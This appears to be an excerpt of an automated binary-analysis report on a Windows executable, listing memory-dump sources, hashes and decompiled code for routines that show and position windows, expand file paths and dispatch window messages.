0x0359429e 0x035942a7 0x035942b2 0x035942b7 0x035942bb 0x035942c0 0x035942c3 0x035942c3 0x035942c6 0x035942c9 0x035942d0 0x035942d0 0x035942c9 0x035942b7 0x035942d5 0x035942de 0x035942e0 0x035942e0 0x035942e7 0x035942e9 0x035942e9 0x035942f1 0x035942fa 0x035942fc 0x035942fc 0x03594302 0x03594308 0x03594308 0x03594318 0x03594318 0x00000000 0x03594261 0x03594261 0x03594267 0x03594269 0x0359426b 0x00000000 0x03594261 0x035940b7 0x035940b7 0x035940bc 0x035940bc

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: dc95854858e10798446e323f7915729a2f21f1ad6e91984b7837d1fb1b84958b Instruction ID: e3214d9cc8ecb0a077a03f20ebfe73ca42ff4795651af1370b8e5ea22e661c5f Opcode Fuzzy Hash: dc95854858e10798446e323f7915729a2f21f1ad6e91984b7837d1fb1b84958b Instruction Fuzzy Hash: 8021F4B9504A059FDB18EF29E444A6ABBF4FB49315F54801EE804CB238D731594AFB50

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: d7de1925da806f65d7d530c067f10aac7f3e8d0c4992daa96e9b6c3cfeba7af4 Instruction ID: 80ac156c35056acb340244b866cdfb40d0e7d38eb9bf993f5a24bb1b124f27e1 Opcode Fuzzy Hash: d7de1925da806f65d7d530c067f10aac7f3e8d0c4992daa96e9b6c3cfeba7af4 Instruction Fuzzy Hash: 2BF06D7A608A45DFEB21CE5AE89181AF7F8FB4962035A007BF904C7620D635AC159A60

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 84%

E00452B78(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) { intOrPtr* _v8; char _v12; intOrPtr _t157; intOrPtr _t161; intOrPtr _t163; intOrPtr _t164; intOrPtr _t165; intOrPtr _t169; intOrPtr _t174; intOrPtr _t176; intOrPtr _t177; void* _t179; struct HWND__* _t180; long _t190; long _t241; intOrPtr _t247; int _t252; intOrPtr _t253; intOrPtr _t266; intOrPtr _t270; signed int _t276; intOrPtr _t277; intOrPtr _t290; intOrPtr _t294; intOrPtr _t298; intOrPtr _t299; void* _t307; void* _t309; intOrPtr _t316; signed int _t326; signed int _t327; void* _t329; long _t333; intOrPtr _t337; struct HWND__* _t342; signed int _t344; signed int _t345; signed int _t348; signed int _t350; long _t351; signed int _t354; signed int _t356; signed int _t357; void* _t359; intOrPtr _t373; signed int _t389; signed int _t390; intOrPtr _t391; signed int _t400; signed int _t401; signed int _t403; signed int _t405; long _t406; signed int _t408; long _t409; signed int _t411; signed int _t412; void* _t414; void* _t415; intOrPtr _t416; _t414 = _t415; _t416 = _t415 + 0xfffffff8; _v12 = 0; _v8 = __eax; _push(_t414); _push(0x453183); _push( *[fs:eax]); *[fs:eax] = _t416; if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x358) & 0x00000004) != 0) { _t337 = *0x462f24; // 0x423578 E00406740(_t337, &_v12); E0040C11C(_v12, 1); E00404184(); } _t157 = *0x466580; // 0x27bf470 E00457AB0(_t157); *(_v8 + 0x358) = *(_v8 + 0x358) | 0x00000004; _push(_t414); _push(0x453166); _push( *[fs:edx]); *[fs:edx] = _t416; if(( *(_v8 + 0x1c) & 0x00000010) != 0) { _t161 = _v8; __eflags = *(_t161 + 0x1c) & 0x00000010; if(( *(_t161 + 0x1c) & 0x00000010) != 0) { _t164 = _v8; __eflags = *(_t164 + 0x30); if( *(_t164 + 0x30) != 0) { _t165 = _v8; __eflags = *((char*)(_t165 + 0x1da)); if( *((char*)(_t165 + 0x1da)) != 0) { ShowWindow(E004423F8(_v8), 1); } } } L82: _pop(_t373); *[fs:eax] = _t373; _push(0x45316d); _t163 = _v8; *(_t163 + 0x358) = *(_t163 + 0x358) & 0x000000fb; return _t163; } _t169 = _v8; _t420 = *((char*)(_t169 + 0x1da)); if( *((char*)(_t169 + 0x1da)) == 0) { _push(_t414); _push(0x453037); _push( *[fs:eax]); *[fs:eax] = _t416; E00403B24(_v8, __eflags); *[fs:eax] = 0; _t174 = *0x466584; // 0x27c66a0 __eflags = *((intOrPtr*)(_t174 + 0x6c)) - _v8; if( *((intOrPtr*)(_t174 + 0x6c)) == _v8) { __eflags = 0; E00451B54(_v8, 0); } _t176 = _v8; __eflags = *((char*)(_t176 + 0x277)) - 1; if( *((char*)(_t176 + 0x277)) != 1) { _t177 = _v8; __eflags = *(_t177 + 0x358) & 0x00000008; if(( *(_t177 + 0x358) & 0x00000008) == 0) { _t342 = 0; _t179 = E004423F8(_v8); _t180 = GetActiveWindow(); __eflags = _t179 - _t180; if(_t179 == _t180) { _t190 = IsIconic(E004423F8(_v8)); __eflags = _t190; if(_t190 == 0) { _t342 = E0044CB68(E004423F8(_v8)); } } __eflags = _t342; if(_t342 == 0) { ShowWindow(E004423F8(_v8), 0); } else { SetWindowPos(E004423F8(_v8), 0, 0, 0, 0, 0, 0x97); SetActiveWindow(_t342); } } else { SetWindowPos(E004423F8(_v8), 0, 0, 0, 0, 0, 0x97); } } else { *((intOrPtr*)( *_v8 + 0xb0))(); } goto L82; } _push(_t414); _push(0x452c30); _push( *[fs:eax]); *[fs:eax] = _t416; E00403B24(_v8, _t420); *[fs:eax] = 0; if( *(_v8 + 0x278) == 4 || *(_v8 + 0x278) == 6 && *((char*)(_v8 + 0x277)) == 1) { if( *((char*)(_v8 + 0x277)) != 1) { _t344 = E00454604() - *(_v8 + 0x48); __eflags = _t344; _t345 = _t344 >> 1; if(_t344 < 0) { asm("adc ebx, 0x0"); } _t400 = E004545F8() - *(_v8 + 0x4c); __eflags = _t400; _t401 = _t400 >> 1; if(_t400 < 0) { asm("adc esi, 0x0"); } } else { _t266 = *0x466580; // 0x27bf470 _t348 = E0043A398( *((intOrPtr*)(_t266 + 0x44))) - *(_v8 + 0x48); _t345 = _t348 >> 1; if(_t348 < 0) { asm("adc ebx, 0x0"); } _t270 = *0x466580; // 0x27bf470 _t403 = E0043A3DC( *((intOrPtr*)(_t270 + 0x44))) - *(_v8 + 0x4c); _t401 = _t403 >> 1; if(_t403 < 0) { asm("adc esi, 0x0"); } } if(_t345 < E0045461C()) { _t345 = E0045461C(); } if(_t401 < E00454610()) { _t401 = E00454610(); } *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c), *(_v8 + 0x48)); if( *((char*)(_v8 + 0x57)) != 0) { E00450A44(_v8); } goto L59; } else { _t276 = *(_v8 + 0x278) & 0x000000ff; __eflags = _t276 + 0xfa - 2; if(_t276 + 0xfa - 2 >= 0) { __eflags = _t276 - 5; if(_t276 == 5) { _t277 = _v8; __eflags = *((char*)(_t277 + 0x277)) - 1; if( *((char*)(_t277 + 0x277)) != 1) { _t350 = E00454634() - *(_v8 + 0x48); __eflags = _t350; _t351 = _t350 >> 1; if(_t350 < 0) { asm("adc ebx, 0x0"); } _t405 = E00454628() - *(_v8 + 0x4c); __eflags = _t405; _t406 = _t405 >> 1; if(_t405 < 0) { asm("adc esi, 0x0"); } } else { _t290 = *0x466580; // 0x27bf470 _t354 = E0043A398( *((intOrPtr*)(_t290 + 0x44))) - *(_v8 + 0x48); __eflags = _t354; _t351 = _t354 >> 1; if(_t354 < 0) { asm("adc ebx, 0x0"); } _t294 = *0x466580; // 0x27bf470 _t408 = E0043A3DC( *((intOrPtr*)(_t294 + 0x44))) - *(_v8 + 0x4c); __eflags = _t408; _t406 = _t408 >> 1; if(_t408 < 0) { asm("adc esi, 0x0"); } } __eflags = _t351; if(_t351 < 0) { _t351 = 0; __eflags = 0; } __eflags = _t406; if(_t406 < 0) { _t406 = 0; __eflags = 0; } *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c), *(_v8 + 0x48)); } } else { _t298 = *0x466580; // 0x27bf470 _t409 = *(_t298 + 0x44); _t299 = _v8; __eflags = *((char*)(_t299 + 0x278)) - 7; if( *((char*)(_t299 + 0x278)) == 7) { _t391 = *0x44b288; // 0x44b2d4 _t333 = E00403AB4( *(_v8 + 4), _t391); __eflags = _t333; if(_t333 != 0) { _t409 = *(_v8 + 4); } } __eflags = _t409; if(_t409 == 0) { _t356 = E00454604() - *(_v8 + 0x48); __eflags = _t356; _t357 = _t356 >> 1; if(_t356 < 0) { asm("adc ebx, 0x0"); } _t411 = E004545F8() - *(_v8 + 0x4c); __eflags = _t411; _t412 = _t411 >> 1; if(_t411 < 0) { asm("adc esi, 0x0"); } } else { _t359 = E0044ED88(_t409); _t326 = *((intOrPtr*)(_t409 + 0x48)) - *(_v8 + 0x48); __eflags = _t326; _t327 = _t326 >> 1; if(_t326 < 0) { asm("adc eax, 0x0"); } _t357 = _t359 + _t327; _t329 = E0044EDA8(_t409); _t389 = *((intOrPtr*)(_t409 + 0x4c)) - *(_v8 + 0x4c); __eflags = _t389; _t390 = _t389 >> 1; if(_t389 < 0) { asm("adc edx, 0x0"); } _t412 = _t329 + _t390; } _t307 = E0045461C(); __eflags = _t357 - _t307; if(_t357 < _t307) { _t357 = E0045461C(); } _t309 = E00454610(); __eflags = _t412 - _t309; if(_t412 < _t309) { _t412 = E00454610(); } *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c), *(_v8 + 0x48)); _t316 = _v8; __eflags = *((char*)(_t316 + 0x57)); if( *((char*)(_t316 + 0x57)) != 0) { E00450A44(_v8); } } L59: *(_v8 + 0x278) = 0; if( *((char*)(_v8 + 0x277)) != 1) { ShowWindow(E004423F8(_v8), *(0x462740 + ( *(_v8 + 0x273) & 0x000000ff) * 4)); } else { if( *(_v8 + 0x273) != 2) { ShowWindow(E004423F8(_v8), *(0x462740 + ( *(_v8 + 0x273) & 0x000000ff) * 4)); _t241 = *(_v8 + 0x48) | *(_v8 + 0x4c) << 0x00000010; __eflags = _t241; CallWindowProcA(0x406e4c, E004423F8(_v8), 5, 0, _t241); E0043AC50(_v8); } else { _t252 = E004423F8(_v8); _t253 = *0x466580; // 0x27bf470 SendMessageA( *( *((intOrPtr*)(_t253 + 0x44)) + 0x29c), 0x223, _t252, 0); ShowWindow(E004423F8(_v8), 3); } _t247 = *0x466580; // 0x27bf470 SendMessageA( *( *((intOrPtr*)(_t247 + 0x44)) + 0x29c), 0x234, 0, 0); } goto L82; } } 0x00452b79 0x00452b7b 0x00452b83 0x00452b86 0x00452b8b 0x00452b8c 0x00452b91 0x00452b94 0x00452b9e 0x00452baf 0x00452bb4 0x00452bc3 0x00452bc8 0x00452bc8 0x00452bcd 0x00452bd2 0x00452bda 0x00452be3 0x00452be4 0x00452be9 0x00452bec 0x00452bf6 0x00453120 0x00453123 0x00453127 0x00453129 0x0045312c 0x00453130 0x00453132 0x00453135 0x0045313c 0x00453149 0x00453149 0x0045313c 0x00453130 0x0045314e 0x00453150 0x00453153 0x00453156 0x0045315b 0x0045315e 0x00453165 0x00453165 0x00452bfc 0x00452bff 0x00452c06 0x00453015 0x00453016 0x0045301b 0x0045301e 0x00453028 0x00453032 0x0045304e 0x00453056 0x00453059 0x0045305b 0x00453060 0x00453060 0x00453065 0x00453068 0x0045306f 0x00453081 0x00453084 0x0045308b 0x004530af 0x004530b4 0x004530bb 0x004530c0 0x004530c2 0x004530cd 0x004530d2 0x004530d4 0x004530e3 0x004530e3 0x004530d4 0x004530e5 0x004530e7 0x00453119 0x004530e9 0x00453101 0x00453107 0x00453107 0x0045308d 0x004530a5 0x004530a5 0x00453071 0x00453076 0x00453076 0x00000000 0x0045306f 0x00452c0e 0x00452c0f 0x00452c14 0x00452c17 0x00452c21 0x00452c2b 0x00452c51 0x00452c7d 0x00452cc8 0x00452cc8 0x00452ccb 0x00452ccd 0x00452ccf 0x00452ccf 0x00452ce1 0x00452ce1 0x00452ce4 0x00452ce6 0x00452ce8 0x00452ce8 0x00452c7f 0x00452c7f 0x00452c91 0x00452c94 0x00452c96 0x00452c98 0x00452c98 0x00452c9b 0x00452cad 0x00452cb0 0x00452cb2 0x00452cb4 0x00452cb4 0x00452cb2 0x00452cf7 0x00452d03 0x00452d03 0x00452d11 0x00452d1d 0x00452d1d 0x00452d36 0x00452d43 0x00452d4c 0x00452d4c 0x00000000 0x00452d56 0x00452d59 0x00452d65 0x00452d68 0x00452e76 0x00452e78 0x00452e7e 0x00452e81 0x00452e88 0x00452ed3 0x00452ed3 0x00452ed6 0x00452ed8 0x00452eda 0x00452eda 0x00452eec 0x00452eec 0x00452eef 0x00452ef1 0x00452ef3 0x00452ef3 0x00452e8a 0x00452e8a 0x00452e9c 0x00452e9c 0x00452e9f 0x00452ea1 0x00452ea3 0x00452ea3 0x00452ea6 0x00452eb8 0x00452eb8 0x00452ebb 0x00452ebd 0x00452ebf 0x00452ebf 0x00452ebd 0x00452ef6 0x00452ef8 0x00452efa 0x00452efa 0x00452efa 0x00452efc 0x00452efe 0x00452f00 0x00452f00 0x00452f00 0x00452f19 0x00452f19 0x00452d6e 0x00452d6e 0x00452d73 0x00452d76 0x00452d79 0x00452d80 0x00452d88 0x00452d8e 0x00452d93 0x00452d95 0x00452d9a 0x00452d9a 0x00452d95 0x00452d9d 0x00452d9f 0x00452de8 0x00452de8 0x00452deb 0x00452ded 0x00452def 0x00452def 0x00452e01 0x00452e01 0x00452e04 0x00452e06 0x00452e08 0x00452e08 0x00452da1 0x00452da8 0x00452db0 0x00452db0 0x00452db3 0x00452db5 0x00452db7 0x00452db7 0x00452dba 0x00452dbe 0x00452dc9 0x00452dc9 0x00452dcc 0x00452dce 0x00452dd0 0x00452dd0 0x00452dd5 0x00452dd5 0x00452e10 0x00452e15 0x00452e17 0x00452e23 0x00452e23 0x00452e2a 0x00452e2f 0x00452e31 0x00452e3d 0x00452e3d 0x00452e56 0x00452e5c 0x00452e5f 0x00452e63 0x00452e6c 0x00452e6c 0x00452e63 0x00452f1f 0x00452f22 0x00452f33 0x00453009 0x00452f39 0x00452f43 0x00452f96 0x00452faa 0x00452faa 0x00452fbf 0x00452fc7 0x00452f45 0x00452f4a 0x00452f55 0x00452f64 0x00452f74 0x00452f74 0x00452fd5 0x00452fe4 0x00452fe4 0x00000000 0x00452f33

Strings

x5B , xrefs: 00452BAF

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString String ID: x5B API String ID: 2948472770-2671772400 Opcode ID: b6cab51178b630a4eb60dbe479c4b7adbb6bf75e1f0d25b5798c259387243a29 Instruction ID: fdf0033afcd44717c8607ee86a32dba8197f5f55c0a5171d2b836c552c812610 Opcode Fuzzy Hash: b6cab51178b630a4eb60dbe479c4b7adbb6bf75e1f0d25b5798c259387243a29 Instruction Fuzzy Hash: E6026F31A00204EFDB10DF69DA86B9D77F4AB05305F1504AAFD04EB3A3D7B8AE449B49

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%

E00405CBC(CHAR* __eax, int __edx) { CHAR* _v8; int _v12; CHAR* _v16; void* _v20; struct _WIN32_FIND_DATAA _v338; char _v599; void* _t102; intOrPtr* _t103; CHAR* _t106; CHAR* _t108; char* _t109; void* _t110; _v12 = __edx; _v8 = __eax; _v16 = _v8; _v20 = GetModuleHandleA("kernel32.dll"); if(_v20 == 0) { L4: if( *_v8 != 0x5c) { _t108 = &(_v8[2]); goto L10; } else { if(_v8[1] == 0x5c) { _t109 = E00405C9C( &(_v8[2])); if( *_t109 != 0) { _t17 = _t109 + 1; // 0x1 _t108 = E00405C9C(_t17); if( *_t108 != 0) { L10: _t102 = _t108 - _v8; lstrcpynA( &_v599, _v8, _t102 + 1); while( *_t108 != 0) { _t106 = E00405C9C( &(_t108[1])); if(_t106 - _t108 + _t102 + 1 <= 0x105) { lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1); _v20 = FindFirstFileA( &_v599, &_v338); if(_v20 != 0xffffffff) { FindClose(_v20); if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) { *((char*)(_t110 + _t102 - 0x253)) = 0x5c; lstrcpynA( &(( &(( &_v599)[_t102]))[1]), &(_v338.cFileName), 0x105 - _t102 - 1); _t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1; _t108 = _t106; continue; } } } goto L17; } lstrcpynA(_v8, &_v599, _v12); } } } } } else { _t103 = GetProcAddress(_v20, "GetLongPathNameA"); if(_t103 == 0) { goto L4; } else { _push(0x105); _push( &_v599); _push(_v8); if( *_t103() == 0) { goto L4; } else { lstrcpynA(_v8, &_v599, _v12); } } } L17: return _v16; } 0x00405cc8 0x00405ccb 0x00405cd1 0x00405cde 0x00405ce5 0x00405d2a 0x00405d30 0x00405d6d 0x00000000 0x00405d32 0x00405d39 0x00405d4a 0x00405d4f 0x00405d55 0x00405d5d 0x00405d62 0x00405d70 0x00405d72 0x00405d84 0x00405e35 0x00405d96 0x00405da4 0x00405dba 0x00405dd2 0x00405dd9 0x00405ddf 0x00405dfb 0x00405dfd 0x00405e1f 0x00405e31 0x00405e33 0x00000000 0x00405e33 0x00405dfb 0x00405dd9 0x00000000 0x00405da4 0x00405e4d 0x00405e4d 0x00405d62 0x00405d4f 0x00405d39 0x00405ce7 0x00405cf5 0x00405cf9 0x00000000 0x00405cfb 0x00405cfb 0x00405d06 0x00405d0a 0x00405d0f 0x00000000 0x00405d11 0x00405d20 0x00405d20 0x00405d0f 0x00405cf9 0x00405e52 0x00405e5b

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00400000,00461790), ref: 00405CD9 GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 00405CF0 lstrcpynA.KERNEL32(?,?,?), ref: 00405D20 lstrcpynA.KERNEL32(?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405D84 lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DBA FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DCD FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DDF lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DEB lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000), ref: 00405E1F lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00405E2B lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00405E4D

Strings

kernel32.dll , xrefs: 00405CD4 \ , xrefs: 00405DFD GetLongPathNameA , xrefs: 00405CE7

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc String ID: GetLongPathNameA$\$kernel32.dll API String ID: 3245196872-1565342463 Opcode ID: 4c9fd7f5c89b396a6d77d29f335b003aeb63b386fe31a806673f744a8a1e1af7 Instruction ID: ed9b063c7604b8117c629610380ef8646edce7950b787036461636691dd4187e Opcode Fuzzy Hash: 4c9fd7f5c89b396a6d77d29f335b003aeb63b386fe31a806673f744a8a1e1af7 Instruction Fuzzy Hash: AF415171900658ABDB10EBE8CC89ADFB3ACEF04304F1444BBA558F7281D6789F408F58

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%

E004342B4(intOrPtr __eax, void* __ebx, int* __edx, void* __edi, void* __esi) { intOrPtr _v8; struct HMENU__* _v12; signed int _v16; signed int _v17; intOrPtr _v24; int _v28; struct HDC__* _v32; intOrPtr _v36; intOrPtr _v40; intOrPtr _v44; intOrPtr* _v48; char _v52; intOrPtr _t137; signed int _t138; signed int _t151; signed int _t152; intOrPtr* _t154; void* _t159; struct HMENU__* _t161; intOrPtr* _t166; void* _t174; signed int _t178; signed int _t182; void* _t183; void* _t215; void* _t253; signed int _t259; void* _t267; signed int _t273; signed int _t274; signed int _t276; signed int _t277; signed int _t279; signed int _t280; signed int _t282; signed int _t283; signed int _t285; signed int _t286; signed int _t288; signed int _t289; signed int _t292; signed int _t293; intOrPtr _t313; intOrPtr _t335; intOrPtr _t344; intOrPtr _t348; intOrPtr* _t355; signed int _t357; intOrPtr* _t358; signed int _t369; signed int _t370; signed int _t371; signed int _t372; signed int _t373; signed int _t374; signed int _t375; int* _t377; void* _t379; void* _t380; intOrPtr _t381; void* _t382; _t379 = _t380; _t381 = _t380 + 0xffffffd0; _v52 = 0; _t377 = __edx; _v8 = __eax; _push(_t379); _push(0x4347e8); _push( *[fs:eax]); *[fs:eax] = _t381; _t137 = *((intOrPtr*)(__edx)); _t382 = _t137 - 0x111; if(_t382 > 0) { _t138 = _t137 - 0x117; __eflags = _t138; if(_t138 == 0) { _t273 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t273; if(_t273 < 0) { goto L67; } else { _t274 = _t273 + 1; _t369 = 0; __eflags = 0; while(1) { _t151 = E004333E0(E0041A80C(_v8, _t369), _t377[1], __eflags); __eflags = _t151; if(_t151 != 0) { goto L68; } _t369 = _t369 + 1; _t274 = _t274 - 1; __eflags = _t274; if(_t274 != 0) { continue; } else { goto L67; } goto L68; } } } else { _t152 = _t138 - 8; __eflags = _t152; if(_t152 == 0) { _v17 = 0; __eflags = *(__edx + 6) & 0x00000010; if(( *(__edx + 6) & 0x00000010) != 0) { _v17 = 1; } _t276 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t276; if(__eflags < 0) { L32: _t154 = *0x462da4; // 0x466580 E004579C0( *_t154, 0, __eflags); goto L67; } else { _t277 = _t276 + 1; _t370 = 0; __eflags = 0; while(1) { __eflags = _v17 - 1; if(_v17 != 1) { _v12 = _t377[1] & 0x0000ffff; } else { _t161 = _t377[2]; __eflags = _t161; if(_t161 == 0) { _v12 = 0xffffffff; } else { _v12 = GetSubMenu(_t161, _t377[1] & 0x0000ffff); } } _t159 = E0041A80C(_v8, _t370); _t297 = _v17 & 0x000000ff; _v16 = E00433324(_t159, _v17 & 0x000000ff, _v12); __eflags = _v16; if(__eflags != 0) { break; } _t370 = _t370 + 1; _t277 = _t277 - 1; __eflags = _t277; if(__eflags != 0) { continue; } else { goto L32; } goto L68; } E00437730( *((intOrPtr*)(_v16 + 0x58)), _t297, &_v52, __eflags); _t166 = *0x462da4; // 0x466580 E004579C0( *_t166, _v52, __eflags); } } else { __eflags = _t152 == 1; if(_t152 == 1) { _t279 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t279; if(_t279 < 0) { goto L67; } else { _t280 = _t279 + 1; _t371 = 0; __eflags = 0; while(1) { _v48 = E0041A80C(_v8, _t371); _t174 = *((intOrPtr*)( *_v48 + 0x34))(); __eflags = _t174 - _t377[2]; if(_t174 == _t377[2]) { break; } _t178 = E00433324(_v48, 1, _t377[2]); __eflags = _t178; if(_t178 == 0) { _t371 = _t371 + 1; _t280 = _t280 - 1; __eflags = _t280; if(_t280 != 0) { continue; } else { goto L67; } } else { break; } goto L68; } E00433E94(_v48, _t377); } } else { goto L67; } } } goto L68; } else { if(_t382 == 0) { _t282 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t282; if(_t282 < 0) { goto L67; } else { _t283 = _t282 + 1; _t372 = 0; __eflags = 0; while(1) { E0041A80C(_v8, _t372); _t182 = E004333C4(_t377[1] & 0x0000ffff, __eflags); __eflags = _t182; if(_t182 != 0) { goto L68; } _t372 = _t372 + 1; _t283 = _t283 - 1; __eflags = _t283; if(_t283 != 0) { continue; } else { goto L67; } goto L68; } } goto L68; } else { _t183 = _t137 - 0x2b; if(_t183 == 0) { _v40 = *((intOrPtr*)(__edx + 8)); _t285 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t285; if(_t285 < 0) { goto L67; } else { _t286 = _t285 + 1; _t373 = 0; __eflags = 0; while(1) { _v16 = E00433324(E0041A80C(_v8, _t373), 0, *((intOrPtr*)(_v40 + 8))); __eflags = _v16; if(_v16 != 0) { break; } _t373 = _t373 + 1; _t286 = _t286 - 1; __eflags = _t286; if(_t286 != 0) { continue; } else { goto L67; } goto L69; } _v24 = E004262D8(0, 1); _push(_t379); _push(0x43461b); _push( *[fs:eax]); *[fs:eax] = _t381; _v28 = SaveDC( *(_v40 + 0x18)); _push(_t379); _push(0x4345fe); _push( *[fs:eax]); *[fs:eax] = _t381; E004268A4(_v24, *(_v40 + 0x18)); E00426738(_v24); E00434AAC(_v16, _v40 + 0x1c, _v24, *(_v40 + 0x10) & 0x0000ffff); _pop(_t335); *[fs:eax] = _t335; _push(0x434605); __eflags = 0; E004268A4(_v24, 0); return RestoreDC( *(_v40 + 0x18), _v28); } } else { _t215 = _t183 - 1; if(_t215 == 0) { _v44 = *((intOrPtr*)(__edx + 8)); _t288 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t288; if(_t288 < 0) { goto L67; } else { _t289 = _t288 + 1; _t374 = 0; __eflags = 0; while(1) { _v16 = E00433324(E0041A80C(_v8, _t374), 0, *((intOrPtr*)(_v44 + 8))); __eflags = _v16; if(_v16 != 0) { break; } _t374 = _t374 + 1; _t289 = _t289 - 1; __eflags = _t289; if(_t289 != 0) { continue; } else { goto L67; } goto L69; } _v32 = GetWindowDC( *(_v8 + 0x10)); *[fs:eax] = _t381; _v24 = E004262D8(0, 1); *[fs:eax] = _t381; _v28 = SaveDC(_v32); *[fs:eax] = _t381; E004268A4(_v24, _v32); E00426738(_v24); *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10, *[fs:eax], 0x43471c, _t379, *[fs:eax], 0x434739, _t379, *[fs:eax], 0x43475e, _t379); _pop(_t344); *[fs:eax] = _t344; _push(0x434723); __eflags = 0; E004268A4(_v24, 0); return RestoreDC(_v32, _v28); } } else { if(_t215 == 0x27) { _v36 = *((intOrPtr*)(__edx + 8)); _t292 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t292; if(_t292 < 0) { goto L67; } else { _t293 = _t292 + 1; _t375 = 0; __eflags = 0; while(1) { _t253 = *((intOrPtr*)( *((intOrPtr*)(E0041A80C(_v8, _t375))) + 0x34))(); _t348 = _v36; __eflags = _t253 - *((intOrPtr*)(_t348 + 0xc)); if(_t253 != *((intOrPtr*)(_t348 + 0xc))) { _v16 = E00433324(E0041A80C(_v8, _t375), 1, *((intOrPtr*)(_v36 + 0xc))); } else { _v16 = *((intOrPtr*)(E0041A80C(_v8, _t375) + 0x34)); } __eflags = _v16; if(_v16 != 0) { break; } _t375 = _t375 + 1; _t293 = _t293 - 1; __eflags = _t293; if(_t293 != 0) { continue; } else { goto L67; } goto L68; } _t259 = E00433354(E0041A80C(_v8, _t375), 1, *((intOrPtr*)(_v36 + 8))); __eflags = _t259; if(_t259 == 0) { _t267 = E0041A80C(_v8, _t375); __eflags = 0; _t259 = E00433354(_t267, 0, *((intOrPtr*)(_v36 + 0xc))); } _t355 = *0x462f14; // 0x466584 _t357 = *( *_t355 + 0x6c); __eflags = _t357; if(_t357 != 0) { __eflags = _t259; if(_t259 == 0) { _t259 = *(_t357 + 0x160); } __eflags = *(_t357 + 0x270) & 0x00000008; if(( *(_t357 + 0x270) & 0x00000008) == 0) { _t358 = *0x462da4; // 0x466580 E004575F4( *_t358, _t293, _t259, _t375, _t377); } else { E0045767C(); } } } } else { L67: _t377[3] = DefWindowProcA( *(_v8 + 0x10), *_t377, _t377[1], _t377[2]); } L68: _pop(_t313); *[fs:eax] = _t313; _push(0x4347ef); return E0040473C( &_v52); } } } } L69: } 0x004342b5 0x004342b7 0x004342bf 0x004342c2 0x004342c4 0x004342c9 0x004342ca 0x004342cf 0x004342d2 0x004342d5 0x004342d7 0x004342dc 0x004342fe 0x004342fe 0x00434303 0x00434352 0x00434353 0x00434355 0x00000000 0x0043435b 0x0043435b 0x0043435c 0x0043435c 0x0043435e 0x0043436b 0x00434370 0x00434372 0x00000000 0x00000000 0x00434378 0x00434379 0x00434379 0x0043437a 0x00000000 0x0043437c 0x00000000 0x0043437c 0x00000000 0x0043437a 0x0043435e 0x00434305 0x00434305 0x00434305 0x00434308 0x00434381 0x00434385 0x00434389 0x0043438b 0x0043438b 0x00434395 0x00434396 0x00434398 0x0043440f 0x0043440f 0x00434418 0x00000000 0x0043439a 0x0043439a 0x0043439b 0x0043439b 0x0043439d 0x0043439d 0x004343a1 0x004343c7 0x004343a3 0x004343a3 0x004343a6 0x004343a8 0x004343ba 